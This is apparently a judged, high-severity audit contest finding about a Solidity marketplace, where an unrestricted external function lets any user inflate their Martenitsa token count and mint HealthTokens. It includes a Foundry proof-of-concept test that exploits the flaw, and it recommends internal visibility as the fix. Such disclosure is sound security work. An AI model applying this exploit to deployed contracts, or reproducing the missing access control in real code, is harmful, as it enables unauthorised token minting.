Contest tags: Beginner Friendly, Foundry, GameFi
Submission Details
Severity: high
Valid

`MartenitsaToken:updateCountMartenitsaTokensOwner` user can update the count of martenitsaTokens without any restrictions

Summary

In MartenitsaToken:updateCountMartenitsaTokensOwner, any user can update the count of martenitsaTokens without any restriction. They are then able to collect as many HealthTokens as they want.

Vulnerability Details

Because the count of martenitsaTokens can be updated without restriction, users are able to mint HealthToken indefinitely.

  1. Update count of martenitsaTokens with MartenitsaToken:updateCountMartenitsaTokensOwner

  2. Collect the number of HealthTokens in proportion to the number of (fake) tokens you have (1 HealthToken for 3 fake MartenitsaTokens) by calling MartenitsaMarketplace:collectReward.

In this test we collect 3 HealthTokens while not owning any martenitsaToken.

```solidity
function testVulnCollectReward() public {
    vm.startPrank(bob);
    // bob inflates his own counter nine times; no Martenitsa token is ever minted or bought
    martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
    martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
    martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
    martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
    martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
    martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
    martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
    martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
    martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
    // 9 counted tokens / 3 per reward = 3 HealthTokens (18 decimals)
    marketplace.collectReward();
    assert(healthToken.balanceOf(bob) == 3 * 10 ** 18);
    vm.stopPrank();
}
```

Impact

HealthToken can be minted, and a user can participate in an event, without owning any martenitsaToken.

Tools Used

Manual review

Recommendations

MartenitsaToken:updateCountMartenitsaTokensOwner must only be callable by the MartenitsaMarketplace contract, using the internal visibility specifier instead of external. The MartenitsaMarketplace contract will therefore need to be refactored accordingly.

Updates

Lead Judging Commences

bube Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Missing access control
